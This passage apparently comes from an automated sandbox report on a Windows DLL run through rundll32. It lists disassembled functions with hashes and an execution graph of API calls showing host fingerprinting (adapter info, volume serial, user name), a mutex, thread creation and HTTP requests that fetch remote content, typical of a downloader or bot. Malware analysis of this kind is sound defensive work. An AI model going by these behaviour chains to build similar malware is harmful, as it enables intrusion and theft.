                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ef292095189d688244afeea7f6b845bb184af88f8cb6fafd7eee9d63f68d16f4
                                                                                                                                                            • Instruction ID: 975f7225a3a63e299421f78f145c918a74a67d24bf9757e7338846c982cfeb7d
                                                                                                                                                            • Opcode Fuzzy Hash: ef292095189d688244afeea7f6b845bb184af88f8cb6fafd7eee9d63f68d16f4
                                                                                                                                                            • Instruction Fuzzy Hash: D4B1D232616B8886EB96CF69E4403ED77A4F748FD8F149119EE4903BA8DF38C599C340
                                                                                                                                                            Function 000000018001C340 Relevance: 7.7, APIs: 5, Instructions: 216COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2138705365-0
                                                                                                                                                            • Opcode ID: e6622a1003ff05e1210d2c7c0291edc59dcda77f184723c5f9fea43b66e241c3
                                                                                                                                                            • Instruction ID: 212c56f00f68a2ef71f83bc1973b783350eb29f8722c30a54f44c08f54aa4c97
                                                                                                                                                            • Opcode Fuzzy Hash: e6622a1003ff05e1210d2c7c0291edc59dcda77f184723c5f9fea43b66e241c3
                                                                                                                                                            • Instruction Fuzzy Hash: 8B81CF72614F8885EB528F25E45039D7360F789BE4F409216FB9C03BAAEF78C698C744
                                                                                                                                                            Function 00000001800EFD34 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00000001800DB982,?,?,?,00000001800DD477,?,?,00000000,00000001800EF007), ref: 00000001800EFD53
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DB982,?,?,?,00000001800DD477,?,?,00000000,00000001800EF007), ref: 00000001800EFD72
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DB982,?,?,?,00000001800DD477,?,?,00000000,00000001800EF007), ref: 00000001800EFD9A
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DB982,?,?,?,00000001800DD477,?,?,00000000,00000001800EF007), ref: 00000001800EFDAB
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DB982,?,?,?,00000001800DD477,?,?,00000000,00000001800EF007), ref: 00000001800EFDBC
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                            • Opcode ID: 64e394b7381dc10eb27666501ca5dcdb65787ad9e54def4269ffa76a45e47e76
                                                                                                                                                            • Instruction ID: ff9aa437c0595ea1eb9d58ea7ad14249b49a3c0f1692886f92c925acf78205b5
                                                                                                                                                            • Opcode Fuzzy Hash: 64e394b7381dc10eb27666501ca5dcdb65787ad9e54def4269ffa76a45e47e76
                                                                                                                                                            • Instruction Fuzzy Hash: 40118B3030868D42FAEAA3216D513F962474F8C3F0F55C328B9396ABD6DE28CF499300
                                                                                                                                                            Function 0000000180016E10 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast$Thread$CreateCurrent
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2930290305-0
                                                                                                                                                            • Opcode ID: 5bfa75c5eac8daa5e5b124f9845cd5dbd0aa6498d9a00ed29e9f5e9b47d3ee95
                                                                                                                                                            • Instruction ID: 75230aab8a6d904f90b672090fcd263d29a486a149c04a4e1d63e4c13d8814a9
                                                                                                                                                            • Opcode Fuzzy Hash: 5bfa75c5eac8daa5e5b124f9845cd5dbd0aa6498d9a00ed29e9f5e9b47d3ee95
                                                                                                                                                            • Instruction Fuzzy Hash: 93118235B04F4482EB968B25F85439DA2A1FB8CBE4F448625FF6943BE4DF38C6598700
                                                                                                                                                            Function 00000001800420E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 131COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                            • API String ID: 2775327233-1405518554
                                                                                                                                                            • Opcode ID: 5b311788567aa043f92aba488ebe8b2e5c9052ebe229d9d5e94981fd2abaa2a8
                                                                                                                                                            • Instruction ID: 9e5a5e08860c88efdfc9631ff2a57989cd1dbfec02a922697c63f09b54788598
                                                                                                                                                            • Opcode Fuzzy Hash: 5b311788567aa043f92aba488ebe8b2e5c9052ebe229d9d5e94981fd2abaa2a8
                                                                                                                                                            • Instruction Fuzzy Hash: 41516E33312A48DAEB96DF70D4903EC33A4EB58788F448125FF4967A95DE34C61AC358
                                                                                                                                                            Function 0000000180014060 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                            • String ID: string too long
                                                                                                                                                            • API String ID: 3668304517-2556327735
                                                                                                                                                            • Opcode ID: a3acfd3d82963a706bc48d948a37a32f85189e9a0e2e76b76b124625f236f818
                                                                                                                                                            • Instruction ID: 5fc0c0a601f6c4d82b55d0d521c46b81e316b69cb665f141bfa2e52588e3f1ef
                                                                                                                                                            • Opcode Fuzzy Hash: a3acfd3d82963a706bc48d948a37a32f85189e9a0e2e76b76b124625f236f818
                                                                                                                                                            • Instruction Fuzzy Hash: 6321D4B271168CC1EE6A56A694493DC2242931EBE1F60C711FB3D0FBD6DE3986C94301
                                                                                                                                                            Function 0000000180003BB0 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConditionMask$InfoVerifyVersion
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2793162063-0
                                                                                                                                                            • Opcode ID: 291ec1e7ae4a31a4ec110783320109d88dec717fbf20de4c32bb65debcfab247
                                                                                                                                                            • Instruction ID: 829d03ffbff77bbca154661313b9d0eb454c077c2207eabb3bfd33caf306102b
                                                                                                                                                            • Opcode Fuzzy Hash: 291ec1e7ae4a31a4ec110783320109d88dec717fbf20de4c32bb65debcfab247
                                                                                                                                                            • Instruction Fuzzy Hash: C5116131605B4486E776CF61F4993CA63A0F78CB08F40A028DA8D87B55EF7CC2098B00
                                                                                                                                                            Function 00000001800D6458 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                            • Opcode ID: 01b0716ae32aa2de9c7ee0f5f817d458d00bda1606e98d4af1f1031553b1f871
                                                                                                                                                            • Instruction ID: 97576ab1064a69c91ed25d2ea4c15b169313daa3b111c4d023c45fbb1d204dd6
                                                                                                                                                            • Opcode Fuzzy Hash: 01b0716ae32aa2de9c7ee0f5f817d458d00bda1606e98d4af1f1031553b1f871
                                                                                                                                                            • Instruction Fuzzy Hash: 4D113332710F0489EB41DF60E8583E833A4F71DB68F441E25EA6D47BA4DF78C2588340
                                                                                                                                                            Function 000000018000E1E0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 329COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                            • String ID: vector too long
                                                                                                                                                            • API String ID: 3668304517-2873823879
                                                                                                                                                            • Opcode ID: 4bb3616d7ea08d404592599af73fc3ed7cee367de65b429240fbc6d2583e8d6d
                                                                                                                                                            • Instruction ID: 21201f496ad6a7353e8fa5487a27329982cc9aebad2248fd340af911cef24260
                                                                                                                                                            • Opcode Fuzzy Hash: 4bb3616d7ea08d404592599af73fc3ed7cee367de65b429240fbc6d2583e8d6d
                                                                                                                                                            • Instruction Fuzzy Hash: 73B104326056CC45EEE7CA11D5143E97AA0A34E7E4F88DA11FAA9277D5DF7CC7898300
                                                                                                                                                            Function 00000001800D7BA8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,000000018001D2F1,?,?,?,?,0000000180001063), ref: 00000001800D7BF8
                                                                                                                                                            • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000000018001D2F1,?,?,?,?,0000000180001063), ref: 00000001800D7C39
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                            • String ID: csm
                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                            • Opcode ID: 8575af2157c29f55c7baebbd7653556403f1897381ddad26d7c95b73a62a9a2e
                                                                                                                                                            • Instruction ID: fcce759da6952b3a2c3e9be7184885aaee10aadabcae59dccbb82db99caeb89f
                                                                                                                                                            • Opcode Fuzzy Hash: 8575af2157c29f55c7baebbd7653556403f1897381ddad26d7c95b73a62a9a2e
                                                                                                                                                            • Instruction Fuzzy Hash: 99115B36614B8482EBA28B15E44038D77E4F78CB94F588225EE8D07B65EF3CC655CB00

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:11.5%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                            Signature Coverage:0.6%
                                                                                                                                                            Total number of Nodes:868
                                                                                                                                                            Total number of Limit Nodes:10
                                                                                                                                                            execution_graph 4559 2beb86c 4560 2beb8c6 4559->4560 4561 2beb880 4559->4561 4562 2beb89e VirtualFree 4561->4562 4563 2be82b4 NtFreeVirtualMemory 4562->4563 4563->4560 3639 2be545d 3640 2be53a4 3639->3640 3641 2be5265 3639->3641 3642 2be5479 3640->3642 3644 2be82b4 NtFreeVirtualMemory 3640->3644 3643 2be5315 3641->3643 3646 2be5292 3641->3646 3645 2be532e HttpOpenRequestA 3643->3645 3644->3642 3649 2be539c 3645->3649 3648 2be52c7 HttpOpenRequestA 3646->3648 3648->3649 3649->3640 3650 2be53d6 3649->3650 3651 2be53b3 InternetSetOptionA 3649->3651 3652 2be5424 HttpSendRequestA 3650->3652 3655 2be53e0 3650->3655 3651->3650 3653 2be5443 3652->3653 3653->3640 3657 2be82b4 3653->3657 3656 2be53fb HttpSendRequestA 3655->3656 3656->3653 3658 2be82ce NtFreeVirtualMemory 3657->3658 3659 2be82ef 3657->3659 3658->3659 3659->3640 4361 2be922b 4362 2be904b InternetOpenW 4361->4362 4363 2be9086 4361->4363 4362->4363 4366 2be908b 4362->4366 4364 2be923d InternetCloseHandle 4363->4364 4365 2be9248 4363->4365 4364->4365 4367 2be925b 4365->4367 4368 2be9250 InternetCloseHandle 4365->4368 4369 2be55dc 3 API calls 4366->4369 4368->4367 4370 2be90ca 4369->4370 4370->4363 4371 2be90f4 4370->4371 4372 2bec860 8 API calls 4370->4372 4373 2be9106 4371->4373 4374 2be82b4 NtFreeVirtualMemory 4371->4374 4372->4371 4375 2be9118 InternetOpenUrlW 4373->4375 4376 2be82b4 NtFreeVirtualMemory 4373->4376 4374->4373 4375->4363 4378 2be9154 4375->4378 4376->4375 4377 2be915f InternetReadFile 4377->4378 4378->4363 4378->4377 4379 2beb648 3 API calls 4378->4379 4380 2beb388 NtAllocateVirtualMemory 4378->4380 4379->4378 4380->4378 4564 2be696b 4571 2be5b7a new[] 4564->4571 4565 2be69a2 GetExitCodeThread 4565->4571 4566 2be69de GetExitCodeThread 4566->4571 4567 2be5ba7 4568 2bec704 NtDelayExecution 4568->4571 4569 2beb388 NtAllocateVirtualMemory 4569->4571 4570 2be5484 3 API calls 4570->4571 4571->4565 4571->4566 4571->4567 4571->4568 4571->4569 4571->4570 4572 2be6404 wsprintfA 4571->4572 4573 2be6025 wsprintfA 4571->4573 4574 2be5f36 wsprintfA 4571->4574 4575 2bebfc0 NtAllocateVirtualMemory 4571->4575 4576 2be8424 11 API calls 4571->4576 4577 2beb770 NtAllocateVirtualMemory 4571->4577 4578 2beb388 NtAllocateVirtualMemory 4571->4578 4579 2beb388 NtAllocateVirtualMemory 4571->4579 4581 2beb388 NtAllocateVirtualMemory 4571->4581 4587 2be6fc0 NtAllocateVirtualMemory 4571->4587 4588 2bebe64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4571->4588 4589 2be82b4 NtFreeVirtualMemory 4571->4589 4590 2be4e28 14 API calls 4571->4590 4591 2be8bdc GetCursorPos GetTickCount RtlRandom 4571->4591 4592 2be6cfc NtAllocateVirtualMemory 4571->4592 4593 2be5734 73 API calls 4571->4593 4572->4571 4573->4571 4574->4571 4575->4571 4576->4571 4577->4571 4580 2be6187 WideCharToMultiByte 4578->4580 4582 2be6243 WideCharToMultiByte 4579->4582 4583 2bebe64 3 API calls 4580->4583 4584 2be62ff WideCharToMultiByte 4581->4584 4585 2bebe64 3 API calls 4582->4585 4583->4571 4586 2bebe64 3 API calls 4584->4586 4585->4571 4586->4571 4587->4571 4588->4571 4589->4571 4590->4571 4591->4571 4592->4571 4593->4571 3660 2be8a58 3661 2be8a72 3660->3661 3662 2be8a79 3660->3662 3662->3661 3663 2be8b63 GetProcAddress GetProcAddressForCaller 3662->3663 3663->3661 4326 2be44b8 4329 2be43c4 4326->4329 4330 2be41b4 129 API calls 4329->4330 4331 2be43cd 4330->4331 4332 2be43eb 4331->4332 4334 2bec704 NtDelayExecution 4331->4334 4334->4331 4381 2be7528 4382 2be7548 4381->4382 4383 2be754f 4381->4383 4383->4382 4384 2be6fc0 NtAllocateVirtualMemory 4383->4384 4385 2be76a7 4384->4385 4387 2bec734 4385->4387 4388 2bec74f 4387->4388 4390 2bec74a 4387->4390 4389 2beb388 NtAllocateVirtualMemory 4388->4389 4389->4390 4390->4382 3664 2be43c4 3669 2be41b4 3664->3669 3666 2be43cd 3667 2be43eb 3666->3667 3690 2bec704 NtDelayExecution 3666->3690 3670 2be41d4 3669->3670 3691 2be6cb4 3670->3691 3672 2be41dd 3672->3666 3673 2be41d9 3673->3672 3674 2be41fa GetCurrentProcess IsWow64Process 3673->3674 3674->3672 3675 2be4227 3674->3675 3703 2be7274 GetAdaptersInfo 3675->3703 3677 2be422c 3677->3672 3678 2be4266 CreateMutexW 3677->3678 3678->3672 3679 2be4286 GetLastError 3678->3679 3679->3672 3680 2be42ac GetModuleHandleW 3679->3680 3710 2be4c2c GetModuleHandleW GetCurrentProcessId 3680->3710 3687 2be42ec CreateThread 3688 2be4317 3687->3688 4318 2be43f4 3687->4318 3733 2be6c6c CreateThread 3688->3733 3690->3666 3692 2be6cbd 3691->3692 3702 2be6cf3 3692->3702 3735 2beabe8 3692->3735 3702->3673 3704 2be72ad 3703->3704 3705 2be72d1 3703->3705 3761 2beb388 NtAllocateVirtualMemory 3704->3761 3707 2be82b4 NtFreeVirtualMemory 3705->3707 3709 2be72df 3705->3709 3707->3709 3708 2be72b8 GetAdaptersInfo 3708->3705 3709->3677 3763 2be82f4 3710->3763 3714 2be4c7f 3716 2be4d17 GetCurrentProcessId 3714->3716 3717 2be4d33 3714->3717 3718 2be4cf3 3714->3718 3716->3714 3719 2be42c1 3717->3719 3720 2be4d44 3717->3720 3718->3714 3773 2be891c 3718->3773 3719->3672 3722 2be7314 3719->3722 3779 2be4d58 3720->3779 3723 2beb388 NtAllocateVirtualMemory 3722->3723 3724 2be732c 3723->3724 3831 2bebfc0 3724->3831 3726 2be737f 3727 2bebfc0 NtAllocateVirtualMemory 3726->3727 3728 2be42d1 3727->3728 3728->3672 3729 2be71f0 3728->3729 3730 2be7208 3729->3730 3731 2bebfc0 NtAllocateVirtualMemory 3730->3731 3732 2be42e1 3731->3732 3732->3672 3732->3687 3734 2be6ca3 3733->3734 3834 2be5a64 3733->3834 3734->3672 3736 2beb1c8 3735->3736 3737 2be6ccf 3736->3737 3757 2be8a58 3736->3757 3737->3702 3739 2be99d0 3737->3739 3742 2bea82d 3739->3742 3740 2be6cd8 3740->3702 3743 2beaa0c 3740->3743 3741 2be8a58 2 API calls 3741->3742 3742->3740 3742->3741 3746 2beab3d 3743->3746 3744 2bea8e0 7 API calls 3744->3746 3745 2be6ce1 3745->3702 3747 2be9350 3745->3747 3746->3744 3746->3745 3750 2be9892 3747->3750 3748 2be6cea 3748->3702 3753 2beb2a4 3748->3753 3749 2be9972 3752 2be8a58 2 API calls 3749->3752 3750->3748 3750->3749 3751 2be8a58 GetProcAddress GetProcAddressForCaller 3750->3751 3751->3750 3752->3748 3754 2beb315 3753->3754 3755 2be8a58 2 API calls 3754->3755 3756 2beb372 3754->3756 3755->3754 3756->3702 3758 2be8a72 3757->3758 3759 2be8a79 3757->3759 3758->3736 3759->3758 3760 2be8b63 GetProcAddress GetProcAddressForCaller 3759->3760 3760->3758 3762 2beb3c8 3761->3762 3762->3708 3782 2be8c30 3763->3782 3768 2be8d3c 3829 2beb470 3768->3829 3771 2be8d6e wsprintfA 3772 2be8d87 3771->3772 3772->3714 3774 2be893a 3773->3774 3775 2be894c RtlGetVersion 3774->3775 3776 2be8957 3774->3776 3775->3776 3777 2be8961 GetVersionExW 3776->3777 3778 2be896c 3776->3778 3777->3778 3778->3718 3780 2be4d66 CloseHandle 3779->3780 3781 2be4d73 3779->3781 3780->3781 3781->3719 3783 2be8c4e 3782->3783 3784 2be8c60 FindFirstVolumeW 3783->3784 3785 2be82fd 3784->3785 3786 2be8c81 GetVolumeInformationW FindVolumeClose 3784->3786 3787 2be8e18 3785->3787 3786->3785 3788 2be8e41 3787->3788 3797 2be8fc8 3788->3797 3791 2be4c73 3791->3768 3792 2beb388 NtAllocateVirtualMemory 3793 2be8e63 3792->3793 3794 2be8e91 3793->3794 3802 2bebe64 3793->3802 3796 2be82b4 NtFreeVirtualMemory 3794->3796 3796->3791 3798 2beb388 NtAllocateVirtualMemory 3797->3798 3799 2be8fe4 3798->3799 3800 2be8e4b 3799->3800 3806 2be8ec8 3799->3806 3800->3791 3800->3792 3803 2bebe7c 3802->3803 3809 2bebeac 3803->3809 3805 2bebea5 3805->3794 3807 2be8eea 3806->3807 3808 2be8f05 wsprintfA 3807->3808 3808->3800 3812 2beb704 3809->3812 3811 2bebedb 3811->3805 3813 2beb718 3812->3813 3814 2beb733 3812->3814 3815 2be82b4 NtFreeVirtualMemory 3813->3815 3818 2beb648 3814->3818 3817 2beb725 3815->3817 3817->3811 3819 2beb66f 3818->3819 3820 2beb679 3818->3820 3826 2beb430 3819->3826 3823 2beb388 NtAllocateVirtualMemory 3820->3823 3825 2beb698 3820->3825 3822 2beb6a5 3822->3817 3823->3825 3824 2be82b4 NtFreeVirtualMemory 3824->3822 3825->3822 3825->3824 3827 2beb445 VirtualQuery 3826->3827 3828 2beb441 3826->3828 3827->3828 3828->3820 3830 2be8d5a GetUserNameA 3829->3830 3830->3771 3830->3772 3832 2beb388 NtAllocateVirtualMemory 3831->3832 3833 2bebfdc 3832->3833 3833->3726 3836 2be5aed 3834->3836 3862 2be5b5a new[] 3836->3862 3940 2bec704 NtDelayExecution 3836->3940 